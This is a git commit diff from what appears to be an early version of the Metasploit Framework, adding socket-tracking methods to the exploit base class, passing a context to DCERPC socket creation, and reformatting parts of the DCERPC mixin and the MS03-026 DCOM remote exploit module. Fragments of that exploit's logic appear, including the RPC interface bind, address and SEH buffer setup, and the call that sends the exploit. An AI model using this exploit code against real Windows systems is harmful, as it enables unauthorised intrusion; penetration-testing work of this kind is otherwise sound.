fixes for some socket association stuff
git-svn-id: file:///home/svn/incoming/trunk@3233 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
6d087fe0f3
commit
410770bae6
|
@ -166,6 +166,20 @@ class Exploit < Msf::Module
|
||||||
Exploit::Type::Remote
|
Exploit::Type::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Adds a socket to the list of sockets opened by this exploit.
|
||||||
|
#
|
||||||
|
def add_socket(sock)
|
||||||
|
self.sockets << sock
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Removes a socket from the list of sockets.
|
||||||
|
#
|
||||||
|
def remove_socket(sock)
|
||||||
|
self.sockets.delete(sock)
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# This method is called once a new session has been created on behalf of
|
# This method is called once a new session has been created on behalf of
|
||||||
# this exploit instance and all socket connections created by this
|
# this exploit instance and all socket connections created by this
|
||||||
|
|
|
@ -17,8 +17,8 @@ module Exploit::Remote::DCERPC
|
||||||
DCERPCPacket = Rex::Proto::DCERPC::Packet
|
DCERPCPacket = Rex::Proto::DCERPC::Packet
|
||||||
DCERPCClient = Rex::Proto::DCERPC::Client
|
DCERPCClient = Rex::Proto::DCERPC::Client
|
||||||
DCERPCResponse = Rex::Proto::DCERPC::Response
|
DCERPCResponse = Rex::Proto::DCERPC::Response
|
||||||
DCERPCUUID = Rex::Proto::DCERPC::UUID
|
DCERPCUUID = Rex::Proto::DCERPC::UUID
|
||||||
NDR = Rex::Proto::DCERPC::NDR
|
NDR = Rex::Proto::DCERPC::NDR
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super
|
super
|
||||||
|
@ -34,31 +34,34 @@ module Exploit::Remote::DCERPC
|
||||||
Opt::RHOST,
|
Opt::RHOST,
|
||||||
Opt::RPORT(135),
|
Opt::RPORT(135),
|
||||||
], Msf::Exploit::Remote::DCERPC
|
], Msf::Exploit::Remote::DCERPC
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def dcerpc_handle (uuid, version, protocol, opts)
|
def dcerpc_handle (uuid, version, protocol, opts)
|
||||||
self.handle = Rex::Proto::DCERPC::Handle.new([uuid, version], protocol, datastore['RHOST'], opts)
|
self.handle = Rex::Proto::DCERPC::Handle.new([uuid, version], protocol, datastore['RHOST'], opts)
|
||||||
end
|
end
|
||||||
|
|
||||||
def dcerpc_bind (h)
|
def dcerpc_bind (h)
|
||||||
if datastore['DCERPCFragSize']
|
opts = { 'Msf' => framework, 'MsfExploit' => self }
|
||||||
opts['frag_size'] = datastore['DCERPCFragSize']
|
|
||||||
end
|
|
||||||
|
|
||||||
if datastore['DCERPCFakeMultiBind']
|
if datastore['DCERPCFragSize']
|
||||||
opts['fake_multi_bind'] = 1
|
opts['frag_size'] = datastore['DCERPCFragSize']
|
||||||
end
|
end
|
||||||
|
|
||||||
self.dcerpc = Rex::Proto::DCERPC::Client.new(h, dcerpc_socket(), opts)
|
if datastore['DCERPCFakeMultiBind']
|
||||||
if self.handle.protocol == 'ncacn_np'
|
opts['fake_multi_bind'] = 1
|
||||||
self.simple = self.dcerpc.smb # expose the simple client if we have access to it
|
end
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
def dcerpc_call (function, stub = '')
|
self.dcerpc = Rex::Proto::DCERPC::Client.new(h, dcerpc_socket(), opts)
|
||||||
dcerpc.call(function, stub)
|
|
||||||
end
|
if self.handle.protocol == 'ncacn_np'
|
||||||
|
self.simple = self.dcerpc.smb # expose the simple client if we have access to it
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def dcerpc_call (function, stub = '')
|
||||||
|
dcerpc.call(function, stub)
|
||||||
|
end
|
||||||
|
|
||||||
# Convert a standard ASCII string to 16-bit Unicode
|
# Convert a standard ASCII string to 16-bit Unicode
|
||||||
def unicode (str)
|
def unicode (str)
|
||||||
|
@ -66,7 +69,7 @@ module Exploit::Remote::DCERPC
|
||||||
end
|
end
|
||||||
|
|
||||||
# Used to track the last DCERPC context
|
# Used to track the last DCERPC context
|
||||||
attr_accessor :dcerpc_bind_context, :handle, :dcerpc, :dcerpc_socket
|
attr_accessor :dcerpc_bind_context, :handle, :dcerpc, :dcerpc_socket
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -64,21 +64,25 @@ require 'rex/proto/smb/exceptions'
|
||||||
|
|
||||||
# Create the appropriate socket based on protocol
|
# Create the appropriate socket based on protocol
|
||||||
def socket_setup()
|
def socket_setup()
|
||||||
|
ctx = { 'Msf' => options['Msf'], 'MsfExploit' => options['MsfExploit'] }
|
||||||
self.socket = case self.handle.protocol
|
self.socket = case self.handle.protocol
|
||||||
when 'ncacn_ip_tcp' then Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => self.handle.options[0])
|
when 'ncacn_ip_tcp' then Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => self.handle.options[0], 'Context' => ctx)
|
||||||
when 'ncacn_np' then begin
|
when 'ncacn_np' then begin
|
||||||
socket = ''
|
socket = ''
|
||||||
begin
|
begin
|
||||||
timeout(10) {
|
timeout(10) {
|
||||||
socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 445)
|
socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 445, 'Context' => ctx)
|
||||||
}
|
}
|
||||||
rescue Timeout::Error, Rex::ConnectionRefused
|
rescue Timeout::Error, Rex::ConnectionRefused
|
||||||
socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 139)
|
socket = Rex::Socket.create_tcp('PeerHost' => self.handle.address, 'PeerPort' => 139, 'Context' => ctx)
|
||||||
end
|
end
|
||||||
socket
|
socket
|
||||||
end
|
end
|
||||||
else nil
|
else nil
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Add this socket to the exploit's list of open sockets
|
||||||
|
options['MsfExploit'].add_socket(self.socket) if (options['MsfExploit'])
|
||||||
end
|
end
|
||||||
|
|
||||||
def smb_connect()
|
def smb_connect()
|
||||||
|
|
|
@ -60,11 +60,11 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
||||||
connect
|
connect
|
||||||
print_status("Trying target #{target.name}...")
|
print_status("Trying target #{target.name}...")
|
||||||
|
|
||||||
handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
handle = dcerpc_handle('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57', '0.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||||
print_status("Binding to #{handle} ...")
|
print_status("Binding to #{handle} ...")
|
||||||
dcerpc_bind(handle)
|
dcerpc_bind(handle)
|
||||||
print_status("Bound to #{handle} ...")
|
print_status("Bound to #{handle} ...")
|
||||||
|
|
||||||
# Carefully create the combination of addresses and code for cross-os exploitation
|
# Carefully create the combination of addresses and code for cross-os exploitation
|
||||||
xpseh = Rex::Text.rand_text_alphanumeric(360, payload_badchars)
|
xpseh = Rex::Text.rand_text_alphanumeric(360, payload_badchars)
|
||||||
|
|
||||||
|
@ -176,12 +176,11 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
|
||||||
NDR.long(rand(0xFFFFFFFF))
|
NDR.long(rand(0xFFFFFFFF))
|
||||||
|
|
||||||
|
|
||||||
print_status('sending exploit ...')
|
print_status('sending exploit ...')
|
||||||
begin
|
begin
|
||||||
dcerpc_call(0, stubdata)
|
dcerpc_call(0, stubdata)
|
||||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||||
print_status('server did not respond, but we do not expect it to.')
|
end
|
||||||
end
|
|
||||||
|
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
|
||||||
|
|
Loading…
Reference in New Issue